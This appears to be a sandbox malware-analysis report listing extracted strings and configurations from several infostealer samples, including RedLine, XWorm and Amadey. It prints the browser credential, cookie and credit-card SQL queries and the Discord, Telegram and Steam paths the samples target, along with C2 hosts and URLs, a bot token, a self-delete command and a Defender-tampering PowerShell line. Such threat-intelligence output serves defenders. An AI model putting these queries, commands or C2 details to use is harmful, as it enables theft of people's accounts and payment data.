- CPU:
- Threads:
- Cores:
- RAM:
- Display Resolution:
- GPU:
User Agents:
Installed Apps:
All Users:
Current User:
Process List:
system_info.txt
freebl3.dll
mozglue.dll
msvcp140.dll
nss3.dll
softokn3.dll
vcruntime140.dll
\Temp\
.exe
runas
open
/c start
%DESKTOP%
%APPDATA%
%LOCALAPPDATA%
%USERPROFILE%
%DOCUMENTS%
%PROGRAMFILES%
%PROGRAMFILES_86%
%RECENT%
*.lnk
files
\discord\
\Local Storage\leveldb\CURRENT
\Local Storage\leveldb
\Telegram Desktop\
key_datas
D877F783D5D3EF8C*
map*
A7FDF864FBC10B77*
A92DAA6EA6F891F2*
F8806DD0C461824F*
Telegram
Tox
*.tox
*.ini
Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
00000001
00000002
00000003
00000004
\Outlook\accounts.txt
Pidgin
\.purple\
accounts.xml
dQw4w9WgXcQ
token:
Software\Valve\Steam
SteamPath
\config\
ssfn*
config.vdf
DialogConfig.vdf
DialogConfigOverlay*.vdf
libraryfolders.vdf
loginusers.vdf
\Steam\
sqlite3.dll
browsers
done
soft
\Discord\tokens.txt
/c timeout /t 5 & del /f /q "
" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\system32\cmd.exe
https
Content-Type: multipart/form-data; boundary=----
POST
HTTP/1.1
Content-Disposition: form-data; name="
hwid
build
token
file_name
file
message
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
screenshot.jpg
(PID) Process(4996) u2r4.0.exe
C2185.172.128.62
Strings (351)INSERT_KEY_HERE
27
05
20
24
GetProcAddress
LoadLibraryA
lstrcatA
OpenEventA
CreateEventA
CloseHandle
Sleep
GetUserDefaultLangID
VirtualAllocExNuma
VirtualFree
GetSystemInfo
VirtualAlloc
HeapAlloc
GetComputerNameA
lstrcpyA
GetProcessHeap
GetCurrentProcess
lstrlenA
ExitProcess
GlobalMemoryStatusEx
GetSystemTime
SystemTimeToFileTime
advapi32.dll
gdi32.dll
user32.dll
crypt32.dll
ntdll.dll
GetUserNameA
CreateDCA
GetDeviceCaps
ReleaseDC
CryptStringToBinaryA
sscanf
VMwareVMware
HAL9TH
JohnDoe
DISPLAY
%hu/%hu/%hu
http://185.172.128.62
/902e53a07830e030.php
/0cb78a92c463a69f/
default100
GetEnvironmentVariableA
GetFileAttributesA
GlobalLock
HeapFree
GetFileSize
GlobalSize
CreateToolhelp32Snapshot
IsWow64Process
Process32Next
GetLocalTime
FreeLibrary
GetTimeZoneInformation
GetSystemPowerStatus
GetVolumeInformationA
GetWindowsDirectoryA
Process32First
GetLocaleInfoA
GetUserDefaultLocaleName
GetModuleFileNameA
DeleteFileA
FindNextFileA
LocalFree
FindClose
SetEnvironmentVariableA
LocalAlloc
GetFileSizeEx
ReadFile
SetFilePointer
WriteFile
CreateFileA
FindFirstFileA
CopyFileA
VirtualProtect
GetLogicalProcessorInformationEx
GetLastError
lstrcpynA
MultiByteToWideChar
GlobalFree
WideCharToMultiByte
GlobalAlloc
OpenProcess
TerminateProcess
GetCurrentProcessId
gdiplus.dll
ole32.dll
bcrypt.dll
wininet.dll
shlwapi.dll
shell32.dll
psapi.dll
rstrtmgr.dll
CreateCompatibleBitmap
SelectObject
BitBlt
DeleteObject
CreateCompatibleDC
GdipGetImageEncodersSize
GdipGetImageEncoders
GdipCreateBitmapFromHBITMAP
GdiplusStartup
GdiplusShutdown
GdipSaveImageToStream
GdipDisposeImage
GdipFree
GetHGlobalFromStream
CreateStreamOnHGlobal
CoUninitialize
CoInitialize
CoCreateInstance
BCryptGenerateSymmetricKey
BCryptCloseAlgorithmProvider
BCryptDecrypt
BCryptSetProperty
BCryptDestroyKey
BCryptOpenAlgorithmProvider
GetWindowRect
GetDesktopWindow
GetDC
CloseWindow
wsprintfA
EnumDisplayDevicesA
GetKeyboardLayoutList
CharToOemW
wsprintfW
RegQueryValueExA
RegEnumKeyExA
RegOpenKeyExA
RegCloseKey
RegEnumValueA
CryptBinaryToStringA
CryptUnprotectData
SHGetFolderPathA
ShellExecuteExA
InternetOpenUrlA
InternetConnectA
InternetCloseHandle
InternetOpenA
HttpSendRequestA
HttpOpenRequestA
InternetReadFile
InternetCrackUrlA
StrCmpCA
StrStrA
StrCmpCW
PathMatchSpecA
GetModuleFileNameExA
RmStartSession
RmRegisterResources
RmGetList
RmEndSession
sqlite3_open
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text
sqlite3_finalize
sqlite3_close
sqlite3_column_bytes
sqlite3_column_blob
encrypted_key
PATH
C:\ProgramData\nss3.dll
NSS_Init
NSS_Shutdown
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
C:\ProgramData\
SELECT origin_url, username_value, password_value FROM logins
browser:
profile:
url:
login:
password:
Opera
OperaGX
Network
cookies
.txt
SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
TRUE
FALSE
autofill
SELECT name, value FROM autofill
history
SELECT url FROM urls LIMIT 1000
cc
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
name:
month:
year:
card:
Cookies
Login Data
Web Data
History
logins.json
formSubmitURL
usernameField
encryptedUsername
encryptedPassword
guid
SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
SELECT fieldname, value FROM moz_formhistory
SELECT url FROM moz_places LIMIT 1000
cookies.sqlite
formhistory.sqlite
places.sqlite
plugins
Local Extension Settings
Sync Extension Settings
IndexedDB
Opera Stable
Opera GX Stable
CURRENT
chrome-extension_
_0.indexeddb.leveldb
Local State
profiles.ini
chrome
opera
firefox
wallets
%08lX%04lX%lu
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
x32
x64
%d/%d/%d %d:%d:%d
HARDWARE\DESCRIPTION\System\CentralProcessor\0
ProcessorNameString
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
DisplayVersion
Network Info:
- IP: IP?
- Country: ISO?
System Summary:
- HWID:
- OS:
- Architecture:
- UserName:
- Computer Name:
- Local Time:
- UTC:
- Language:
- Keyboards:
- Laptop:
- Running Path:
- CPU:
- Threads:
- Cores:
- RAM:
- Display Resolution:
- GPU:
User Agents:
Installed Apps:
All Users:
Current User:
Process List:
system_info.txt
freebl3.dll
mozglue.dll
msvcp140.dll
nss3.dll
softokn3.dll
vcruntime140.dll
\Temp\
.exe
runas
open
/c start
%DESKTOP%
%APPDATA%
%LOCALAPPDATA%
%USERPROFILE%
%DOCUMENTS%
%PROGRAMFILES%
%PROGRAMFILES_86%
%RECENT%
*.lnk
files
\discord\
\Local Storage\leveldb\CURRENT
\Local Storage\leveldb
\Telegram Desktop\
key_datas
D877F783D5D3EF8C*
map*
A7FDF864FBC10B77*
A92DAA6EA6F891F2*
F8806DD0C461824F*
Telegram
Tox
*.tox
*.ini
Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
00000001
00000002
00000003
00000004
\Outlook\accounts.txt
Pidgin
\.purple\
accounts.xml
dQw4w9WgXcQ
token:
Software\Valve\Steam
SteamPath
\config\
ssfn*
config.vdf
DialogConfig.vdf
DialogConfigOverlay*.vdf
libraryfolders.vdf
loginusers.vdf
\Steam\
sqlite3.dll
browsers
done
soft
\Discord\tokens.txt
/c timeout /t 5 & del /f /q "
" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\system32\cmd.exe
https
Content-Type: multipart/form-data; boundary=----
POST
HTTP/1.1
Content-Disposition: form-data; name="
hwid
build
token
file_name
file
message
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
screenshot.jpg
(PID) Process(5748) timeSync.exe
C2185.172.128.76
Strings (351)INSERT_KEY_HERE
27
05
20
24
GetProcAddress
LoadLibraryA
lstrcatA
OpenEventA
CreateEventA
CloseHandle
Sleep
GetUserDefaultLangID
VirtualAllocExNuma
VirtualFree
GetSystemInfo
VirtualAlloc
HeapAlloc
GetComputerNameA
lstrcpyA
GetProcessHeap
GetCurrentProcess
lstrlenA
ExitProcess
GlobalMemoryStatusEx
GetSystemTime
SystemTimeToFileTime
advapi32.dll
gdi32.dll
user32.dll
crypt32.dll
ntdll.dll
GetUserNameA
CreateDCA
GetDeviceCaps
ReleaseDC
CryptStringToBinaryA
sscanf
VMwareVMware
HAL9TH
JohnDoe
DISPLAY
%hu/%hu/%hu
http://185.172.128.76
/8681490a59ad0e34.php
/cc79ef49e382fdb7/
default100
GetEnvironmentVariableA
GetFileAttributesA
GlobalLock
HeapFree
GetFileSize
GlobalSize
CreateToolhelp32Snapshot
IsWow64Process
Process32Next
GetLocalTime
FreeLibrary
GetTimeZoneInformation
GetSystemPowerStatus
GetVolumeInformationA
GetWindowsDirectoryA
Process32First
GetLocaleInfoA
GetUserDefaultLocaleName
GetModuleFileNameA
DeleteFileA
FindNextFileA
LocalFree
FindClose
SetEnvironmentVariableA
LocalAlloc
GetFileSizeEx
ReadFile
SetFilePointer
WriteFile
CreateFileA
FindFirstFileA
CopyFileA
VirtualProtect
GetLogicalProcessorInformationEx
GetLastError
lstrcpynA
MultiByteToWideChar
GlobalFree
WideCharToMultiByte
GlobalAlloc
OpenProcess
TerminateProcess
GetCurrentProcessId
gdiplus.dll
ole32.dll
bcrypt.dll
wininet.dll
shlwapi.dll
shell32.dll
psapi.dll
rstrtmgr.dll
CreateCompatibleBitmap
SelectObject
BitBlt
DeleteObject
CreateCompatibleDC
GdipGetImageEncodersSize
GdipGetImageEncoders
GdipCreateBitmapFromHBITMAP
GdiplusStartup
GdiplusShutdown
GdipSaveImageToStream
GdipDisposeImage
GdipFree
GetHGlobalFromStream
CreateStreamOnHGlobal
CoUninitialize
CoInitialize
CoCreateInstance
BCryptGenerateSymmetricKey
BCryptCloseAlgorithmProvider
BCryptDecrypt
BCryptSetProperty
BCryptDestroyKey
BCryptOpenAlgorithmProvider
GetWindowRect
GetDesktopWindow
GetDC
CloseWindow
wsprintfA
EnumDisplayDevicesA
GetKeyboardLayoutList
CharToOemW
wsprintfW
RegQueryValueExA
RegEnumKeyExA
RegOpenKeyExA
RegCloseKey
RegEnumValueA
CryptBinaryToStringA
CryptUnprotectData
SHGetFolderPathA
ShellExecuteExA
InternetOpenUrlA
InternetConnectA
InternetCloseHandle
InternetOpenA
HttpSendRequestA
HttpOpenRequestA
InternetReadFile
InternetCrackUrlA
StrCmpCA
StrStrA
StrCmpCW
PathMatchSpecA
GetModuleFileNameExA
RmStartSession
RmRegisterResources
RmGetList
RmEndSession
sqlite3_open
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text
sqlite3_finalize
sqlite3_close
sqlite3_column_bytes
sqlite3_column_blob
encrypted_key
PATH
C:\ProgramData\nss3.dll
NSS_Init
NSS_Shutdown
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
C:\ProgramData\
SELECT origin_url, username_value, password_value FROM logins
browser:
profile:
url:
login:
password:
Opera
OperaGX
Network
cookies
.txt
SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
TRUE
FALSE
autofill
SELECT name, value FROM autofill
history
SELECT url FROM urls LIMIT 1000
cc
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
name:
month:
year:
card:
Cookies
Login Data
Web Data
History
logins.json
formSubmitURL
usernameField
encryptedUsername
encryptedPassword
guid
SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
SELECT fieldname, value FROM moz_formhistory
SELECT url FROM moz_places LIMIT 1000
cookies.sqlite
formhistory.sqlite
places.sqlite
plugins
Local Extension Settings
Sync Extension Settings
IndexedDB
Opera Stable
Opera GX Stable
CURRENT
chrome-extension_
_0.indexeddb.leveldb
Local State
profiles.ini
chrome
opera
firefox
wallets
%08lX%04lX%lu
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
x32
x64
%d/%d/%d %d:%d:%d
HARDWARE\DESCRIPTION\System\CentralProcessor\0
ProcessorNameString
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
DisplayVersion
Network Info:
- IP: IP?
- Country: ISO?
System Summary:
- HWID:
- OS:
- Architecture:
- UserName:
- Computer Name:
- Local Time:
- UTC:
- Language:
- Keyboards:
- Laptop:
- Running Path:
- CPU:
- Threads:
- Cores:
- RAM:
- Display Resolution:
- GPU:
User Agents:
Installed Apps:
All Users:
Current User:
Process List:
system_info.txt
freebl3.dll
mozglue.dll
msvcp140.dll
nss3.dll
softokn3.dll
vcruntime140.dll
\Temp\
.exe
runas
open
/c start
%DESKTOP%
%APPDATA%
%LOCALAPPDATA%
%USERPROFILE%
%DOCUMENTS%
%PROGRAMFILES%
%PROGRAMFILES_86%
%RECENT%
*.lnk
files
\discord\
\Local Storage\leveldb\CURRENT
\Local Storage\leveldb
\Telegram Desktop\
key_datas
D877F783D5D3EF8C*
map*
A7FDF864FBC10B77*
A92DAA6EA6F891F2*
F8806DD0C461824F*
Telegram
Tox
*.tox
*.ini
Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
00000001
00000002
00000003
00000004
\Outlook\accounts.txt
Pidgin
\.purple\
accounts.xml
dQw4w9WgXcQ
token:
Software\Valve\Steam
SteamPath
\config\
ssfn*
config.vdf
DialogConfig.vdf
DialogConfigOverlay*.vdf
libraryfolders.vdf
loginusers.vdf
\Steam\
sqlite3.dll
browsers
done
soft
\Discord\tokens.txt
/c timeout /t 5 & del /f /q "
" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\system32\cmd.exe
https
Content-Type: multipart/form-data; boundary=----
POST
HTTP/1.1
Content-Disposition: form-data; name="
hwid
build
token
file_name
file
message
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
screenshot.jpg
(PID) Process(4324) u3cw.0.exe
C2185.172.128.62
Strings (351)INSERT_KEY_HERE
27
05
20
24
GetProcAddress
LoadLibraryA
lstrcatA
OpenEventA
CreateEventA
CloseHandle
Sleep
GetUserDefaultLangID
VirtualAllocExNuma
VirtualFree
GetSystemInfo
VirtualAlloc
HeapAlloc
GetComputerNameA
lstrcpyA
GetProcessHeap
GetCurrentProcess
lstrlenA
ExitProcess
GlobalMemoryStatusEx
GetSystemTime
SystemTimeToFileTime
advapi32.dll
gdi32.dll
user32.dll
crypt32.dll
ntdll.dll
GetUserNameA
CreateDCA
GetDeviceCaps
ReleaseDC
CryptStringToBinaryA
sscanf
VMwareVMware
HAL9TH
JohnDoe
DISPLAY
%hu/%hu/%hu
http://185.172.128.62
/902e53a07830e030.php
/0cb78a92c463a69f/
default100
GetEnvironmentVariableA
GetFileAttributesA
GlobalLock
HeapFree
GetFileSize
GlobalSize
CreateToolhelp32Snapshot
IsWow64Process
Process32Next
GetLocalTime
FreeLibrary
GetTimeZoneInformation
GetSystemPowerStatus
GetVolumeInformationA
GetWindowsDirectoryA
Process32First
GetLocaleInfoA
GetUserDefaultLocaleName
GetModuleFileNameA
DeleteFileA
FindNextFileA
LocalFree
FindClose
SetEnvironmentVariableA
LocalAlloc
GetFileSizeEx
ReadFile
SetFilePointer
WriteFile
CreateFileA
FindFirstFileA
CopyFileA
VirtualProtect
GetLogicalProcessorInformationEx
GetLastError
lstrcpynA
MultiByteToWideChar
GlobalFree
WideCharToMultiByte
GlobalAlloc
OpenProcess
TerminateProcess
GetCurrentProcessId
gdiplus.dll
ole32.dll
bcrypt.dll
wininet.dll
shlwapi.dll
shell32.dll
psapi.dll
rstrtmgr.dll
CreateCompatibleBitmap
SelectObject
BitBlt
DeleteObject
CreateCompatibleDC
GdipGetImageEncodersSize
GdipGetImageEncoders
GdipCreateBitmapFromHBITMAP
GdiplusStartup
GdiplusShutdown
GdipSaveImageToStream
GdipDisposeImage
GdipFree
GetHGlobalFromStream
CreateStreamOnHGlobal
CoUninitialize
CoInitialize
CoCreateInstance
BCryptGenerateSymmetricKey
BCryptCloseAlgorithmProvider
BCryptDecrypt
BCryptSetProperty
BCryptDestroyKey
BCryptOpenAlgorithmProvider
GetWindowRect
GetDesktopWindow
GetDC
CloseWindow
wsprintfA
EnumDisplayDevicesA
GetKeyboardLayoutList
CharToOemW
wsprintfW
RegQueryValueExA
RegEnumKeyExA
RegOpenKeyExA
RegCloseKey
RegEnumValueA
CryptBinaryToStringA
CryptUnprotectData
SHGetFolderPathA
ShellExecuteExA
InternetOpenUrlA
InternetConnectA
InternetCloseHandle
InternetOpenA
HttpSendRequestA
HttpOpenRequestA
InternetReadFile
InternetCrackUrlA
StrCmpCA
StrStrA
StrCmpCW
PathMatchSpecA
GetModuleFileNameExA
RmStartSession
RmRegisterResources
RmGetList
RmEndSession
sqlite3_open
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text
sqlite3_finalize
sqlite3_close
sqlite3_column_bytes
sqlite3_column_blob
encrypted_key
PATH
C:\ProgramData\nss3.dll
NSS_Init
NSS_Shutdown
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
C:\ProgramData\
SELECT origin_url, username_value, password_value FROM logins
browser:
profile:
url:
login:
password:
Opera
OperaGX
Network
cookies
.txt
SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
TRUE
FALSE
autofill
SELECT name, value FROM autofill
history
SELECT url FROM urls LIMIT 1000
cc
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
name:
month:
year:
card:
Cookies
Login Data
Web Data
History
logins.json
formSubmitURL
usernameField
encryptedUsername
encryptedPassword
guid
SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
SELECT fieldname, value FROM moz_formhistory
SELECT url FROM moz_places LIMIT 1000
cookies.sqlite
formhistory.sqlite
places.sqlite
plugins
Local Extension Settings
Sync Extension Settings
IndexedDB
Opera Stable
Opera GX Stable
CURRENT
chrome-extension_
_0.indexeddb.leveldb
Local State
profiles.ini
chrome
opera
firefox
wallets
%08lX%04lX%lu
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
x32
x64
%d/%d/%d %d:%d:%d
HARDWARE\DESCRIPTION\System\CentralProcessor\0
ProcessorNameString
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
DisplayVersion
Network Info:
- IP: IP?
- Country: ISO?
System Summary:
- HWID:
- OS:
- Architecture:
- UserName:
- Computer Name:
- Local Time:
- UTC:
- Language:
- Keyboards:
- Laptop:
- Running Path:
- CPU:
- Threads:
- Cores:
- RAM:
- Display Resolution:
- GPU:
User Agents:
Installed Apps:
All Users:
Current User:
Process List:
system_info.txt
freebl3.dll
mozglue.dll
msvcp140.dll
nss3.dll
softokn3.dll
vcruntime140.dll
\Temp\
.exe
runas
open
/c start
%DESKTOP%
%APPDATA%
%LOCALAPPDATA%
%USERPROFILE%
%DOCUMENTS%
%PROGRAMFILES%
%PROGRAMFILES_86%
%RECENT%
*.lnk
files
\discord\
\Local Storage\leveldb\CURRENT
\Local Storage\leveldb
\Telegram Desktop\
key_datas
D877F783D5D3EF8C*
map*
A7FDF864FBC10B77*
A92DAA6EA6F891F2*
F8806DD0C461824F*
Telegram
Tox
*.tox
*.ini
Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
00000001
00000002
00000003
00000004
\Outlook\accounts.txt
Pidgin
\.purple\
accounts.xml
dQw4w9WgXcQ
token:
Software\Valve\Steam
SteamPath
\config\
ssfn*
config.vdf
DialogConfig.vdf
DialogConfigOverlay*.vdf
libraryfolders.vdf
loginusers.vdf
\Steam\
sqlite3.dll
browsers
done
soft
\Discord\tokens.txt
/c timeout /t 5 & del /f /q "
" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\system32\cmd.exe
https
Content-Type: multipart/form-data; boundary=----
POST
HTTP/1.1
Content-Disposition: form-data; name="
hwid
build
token
file_name
file
message
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
screenshot.jpg
RedLine
(PID) Process(4504) jok.exe
C2 (1)185.215.113.67:26260
BotnetTest1234
Options
ErrorMessage
Keys
XorDreggiest
StormKitty
(PID) Process(5176) Orifaaywu.exe
C2 (1)127.0.0.1
Ports (3)6606
7707
8808
Credentials
Protocoltelegram
URLnull
Token7121198938:AAHdK-sn1YVmt_zbc7_hvu1oKZ3HdLVvnwc
ChatId-4193195872
BotnetDefault
Options
AutoRunfalse
MutexAsyncMutex_6SI8OkPnk
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OB...
Server_SignatureJ7XpD4w+JaFzTixc0nCmiRA4ZP4bPCIpEYYGofNxvC1+0OsFQr56oTWwQMosnOTB64TZRGSdXVHKzjVchQf7X5Uwu/KQU61NPArjxWVScwKZXOGS4ZNzsWbrxgztkmlyRlQgvEq4rdFsqy1bfvHEoQ/s9aDXBNoLPPjJOexTRQSGuZYMpGSUD+ZUiVwPqqFWTb8KcjEMyABMeXGKfia2e9u8ePKpWv4HSiOfl6N47tTtIfN2FW/2mCX7BOnIZwCl3UxaQnITN812tHD1enX9TK86R91F02c0wabnf4oC07S3...
Keys
AESe5e3972eba013063607e705973dfdf80a8555bcfd8fe09651da2ab43b5773d9b
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
TRiD
| .exe | | | Win32 Executable (generic) (52.9) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (23.5) |
| .exe | | | DOS Executable Generic (23.5) |
EXIF
EXE
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2023:10:03 07:51:19+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14.33 |
| CodeSize: | 214528 |
| InitializedDataSize: | 119296 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x21d50 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
Total processes
617
Monitored processes
380
Malicious processes
83
Suspicious processes
60
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 112 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2228 --field-trial-handle=1332,i,9598570106424441009,10364676964815892839,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 580 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | disc.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft® Resource File To COFF Object Conversion Utility Version: 14.10.25028.0 built by: VCTOOLSD15RTM Modules
XWorm(PID) Process(580) cvtres.exe C2gamemodz.duckdns.org:6969 Keys AES<123456789> Options Splitter<Xwormmm> Sleep time3 USB drop nameUSB.exe MutexeqLVKldUxQjNG8e8 | |||||||||||||||
| 588 | "C:\Users\admin\Desktop\a\xie.exe" | C:\Users\admin\Desktop\a\xie.exe | New Text Document.exe | ||||||||||||
User: admin Integrity Level: HIGH Modules
| |||||||||||||||
| 764 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | tVH4OnCbZyXaaaaXLi7l.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 860 | schtasks /DELETE /F /TN "JHJXtPPPvDXVqpH" | C:\Windows\System32\schtasks.exe | — | ODiosFd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 924 | "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat | C:\Windows\System32\cmd.exe | PatchesTextbook.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 952 | /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True | C:\Windows\System32\cmd.exe | — | forfiles.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 992 | C:\Users\admin\AppData\Local\Temp\2864119237.exe | C:\Users\admin\AppData\Local\Temp\2864119237.exe | — | 1097519442.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 1020 | "C:\Users\admin\AppData\Local\Temp\154561dcbf\Dctooux.exe" | C:\Users\admin\AppData\Local\Temp\154561dcbf\Dctooux.exe | amadey.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 1073807364 Modules
Amadey(PID) Process(1020) Dctooux.exe C2topgamecheats.dev URLhttp://topgamecheats.dev/j4Fvskd3/index.php Version4.18 Options Drop directory154561dcbf Drop nameDctooux.exe Strings (113)Dctooux.exe ------ Norton SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders un: Programs 2019 " cred.dll|clip.dll| rundll32 0123456789 " && ren e1 ESET CurrentBuild AVG "
Content-Type: application/octet-stream 360TotalSecurity -%lu # lv: && Exit" vs: "taskkill /f /im " <d> 154561dcbf \App Sophos ProgramData\ /Plugins/ st=s = +++ kernel32.dll Main Rem SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\ abcdefghijklmnopqrstuvwxyz0123456789-_ .jpg ps1 %-lu exe Content-Type: multipart/form-data; boundary=---- wb sd: %USERPROFILE% VideoID topgamecheats.dev AVAST Software /j4Fvskd3/index.php SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName ?scr=1 Doctor Web av: SOFTWARE\Microsoft\Windows NT\CurrentVersion " && timeout 1 && del ar: rb ------ 2022 shutdown -s -t 0 4.18 SOFTWARE\Microsoft\Windows\CurrentVersion\Run ::: S-%lu- DefaultSettings.YResolution shell32.dll Content-Type: application/x-www-form-urlencoded ProductName Content-Disposition: form-data; name="data"; filename=" pc: 2016 dll Startup -executionpolicy 